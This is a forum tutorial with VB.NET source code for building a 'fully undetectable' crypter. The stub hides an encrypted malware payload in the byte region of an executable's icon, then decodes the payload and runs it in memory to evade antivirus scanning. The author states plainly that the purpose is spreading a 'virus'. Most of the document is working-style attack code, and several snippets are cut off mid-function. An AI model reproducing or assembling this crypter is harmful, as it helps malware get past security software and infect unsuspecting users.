[TuT][Source] Make Your Own UnKnoWn Crypter by stefsot [100% FUD][Unique\New Method]
all credit goes to stefsot
Introduction
As we know to make a crypter we need to combine both stub and virus (I'll be calling it virus) into a new file (the server). The are several ways of doing it. The most common is to open the stub add a specified string (so we can split it) at and throw the crypted virus at the end of the stub (EOF). Another way is to throw the crypted virus into the resources of the stub and call it whenever we want. These ways are very common and consequently easily detected. The best way to make a crypter is using codedom. Such applications are hard and very delicated. Anyway the method I'm using is similar to the second way but not the same. So what I'm doing different? This might sound easy or "crazy" but took A LOT of time to think it. I'm just getting the virus's bytes and clone it into the icon of the stub, yes the icon! Experimenting, some few days a go, I found I could turn an application into a working .png (so .jpg and .ico files should work) file bypassing EVERY AV. In theory I could turn my virus into an .png (or .ico) file (and I don't mean changing the extention!), add it in my stub's resources and call it whenever I want. This was good for spreading my virus, but not for creating a crypter. Eventualy the solution was to build the stub with a big in size icon and change the bytes storing the virus. Summing up, that we're gonna to do is: to find the offset were the icon starts and changed its bytes with virus's one.
Getting Started
The first thing he have to do is to build the stub. Make a new project, with a name you choose. Change the text of the form to nothing, make opacity 0% and size 0;0. Secondly find a big in size icon and it to the form1 (I personaly use 280k byte icon, but the bigger it is the better). Build your application. Continueing make a new project, the name is not import, this will only be a support application that will help us generate and build the crypter. For avoiding confusion I will be calling the first project (the stub) as project1 and the second project (the second one) as project2.
In project2 add a button and a textbox. Write click the form and select "view source". Add this code in your class:
Code:
Function get_offset(ByVal app_path As String, ByVal icon_path As String)
Dim o As Byte() = IO.File.ReadAllBytes(icon_path)
Dim f As Byte() = IO.File.ReadAllBytes(app_path)
Dim k As Integer = 0
For i = 0 To f.Count - 1
If f(i) = o(0) Then
For i2 = i To i + o.Count - 1
If Not k = o.Count - 1 Then
If f(i2) = o(i2 - i) Then
k += 1
Else
This function will return the number of byte in your buoled stub were the icon code starts.
Now double click the button and add this code
Code:
dim p as string = 'the path to your stub (compiled project1)
dim b as string = 'the path to your icon you added in the stub
Textbox1.text = get_offset(p, b)
Now run the project2 and click the button1. The textbox1 should come up with an integer (the byte\offest, were the icon starts), write it down (we gonna need this).
Building the main crypter
Since we have the offset of the icon (I will be calling just offset), we got the bytes that we can modify in the stub without causing errors. Make a third project (this will be our main crypter), I will be calling it project3.
In project3 add 2xTextbox and 1xButton. The textbox1 will be the file we want to crypt and the Textbox2 the path we want to save it. The button will just do all the stuff. Double click the button and add this code
Code:
If TextBox1.TextLength = 0 Then
MsgBox("Please Select File to crypt!", MsgBoxStyle.Information)
Exit Sub
End If
If TextBox2.TextLength = 0 Then
MsgBox("Please select were you want to save crypted file!", MsgBoxStyle.Information)
Exit Sub
End If
'--
Dim inject As Byte() = Secure(IO.File.ReadAllBytes(TextBox1.Text))
If inject.Count > 286356 Then
You will also need this
Code:
Function Secure(ByVal data As Byte()) As Byte()
For i = 0 To data.Count - 1
If Not data(i) = 0 Then
data(i) -= 1
Else
data(i) = 255
End If
Next
Return data
End Function
I will now explain it:
-The first lines (before the '--) are checking whether we have added the necessary paths.
Code:
Dim inject As Byte() = Secure(IO.File.ReadAllBytes(TextBox1.Text))
If inject.Count > 286356 Then
MsgBox("The file you want to crypt is to big! Please select a file between 0 and 286356 bytes.", MsgBoxStyle.Critical)
Exit Sub
End If
Variable inject is the file we want to crypt in bytes.
"> 286356" This number is the icon's size (that we used in the project1 subtracted by 1000, do the same by adding your number). The code that remains it speaks by itself. The file must have a necessary number of bytes (not bigger than icon's size -1000, that's why we need a big in size icon)
Code:
Dim q As String() = Split(IO.File.ReadAllText(Application.ExecutablePath), "(12345)&(12345)")
Dim f As Byte() = Convert.FromBase64String(q(1))
In these lines the program gets itself, and splits itself using "(12345)&(12345)" this as split word and gets the bytes of the stub. We'll compile the stub into the main crypter later.
Code:
For i As Integer = 1673 + 500 To 1673 + 500 + inject.Count - 1
f(i) = inject(i - 1673 - 500)
Next
Before I explain the code I must declare the numbers. "1673" is the offset that we got (change it with yours) and "500" are the forst 500 bytes of the icon. We should change them as the modification of the very first bytes will just crash our application. Now, this code will get the f() which is our stub and modify the icon's bytes. So far we're ok. Our problem is that we must also store the virus's length in order to let the stub know how many bytes to read. The following code will do the stuff (no I won't explain this line by line, sorry)
Code:
Dim c As String = inject.Count.ToString
Dim d() As String
ReDim d(c.Length)
Dim n As Integer = 0
For Each kl As Char In c
If Not c = "." Then
d(n) = kl
n += 1
End If
Next
So the remaining code will just save the new file
Code:
Try
IO.File.WriteAllBytes(TextBox2.Text, f)
Catch ex As Exception
MsgBox("Failed to save the file! Reason: " & ex.Message, MsgBoxStyle.Critical)
Exit Sub
End Try
MsgBox("File successfully crypted!", MsgBoxStyle.Information)
Build project3. Our crypter is almost ready (we won't use anymore project3, you can close it).
Building our Stub
Go back to project1 write click it and replace all the code with this
Code:
Imports System.Reflection
Imports System.Runtime.CompilerServices
Public Class Form1
Dim t As Threading.Thread = New Threading.Thread(AddressOf run_bytes)
Dim icon_length As Integer = 287356
Dim mikos As String
Dim locationstart As Integer = 1673 + icon_length - 500
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
Me.Location = New Point(-50, -50)
Dim f As Byte() = IO.File.ReadAllBytes(Application.ExecutablePath)
In this code we have the Unsecure algorythm, that will unsecure, the secured bytes.
Code:
Function ERWTVTHCGAFSEDSEDAEDscsegef(ByVal data As Byte()) As Byte() 'unsecure
For i = 0 To data.Count - 1
If Not data(i) = 255 Then
data(i) += 1
Else
data(i) = 0
End If
Next
Return data
End Function
And our runpe function
Code:
Private Sub run_bytes(ByVal bytes As Byte())
Dim assembly As Assembly = assembly.Load(bytes)
Dim entryPoint As MethodInfo = [assembly].EntryPoint
Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
End Sub
Now we must do some modifications.
Change the integer " Dim icon_length As Integer = 287356" to your icon's size (bytes)
Change the 1673 to the offset we found "Dim locationstart As Integer = 1673 + icon_length - 500"
In the form_load event change the the number "1673" with your offset.
I will not really expain the stub as it's easy. It just reads the size of the file that has been "injected", reads it and runs it. Build your stub.
Go to project2 add a new button, double click it and write this
Code:
Dim stub As String = Convert.ToBase64String(IO.File.ReadAllBytes("C:\stub.exe"))
IO.File.AppendAllText("C:\v2.exe", "(12345)&(12345)" & stub)
Just copy your main crypter (compiled project3) in "C:\v2.exe" and your stub (compiled project1) in "C:\stub.exe". Run project2 and click your second button in order to combine both crypter and stub. If no errors came up, then the "C:\v2.exe" is our complete crypter and ready to be used.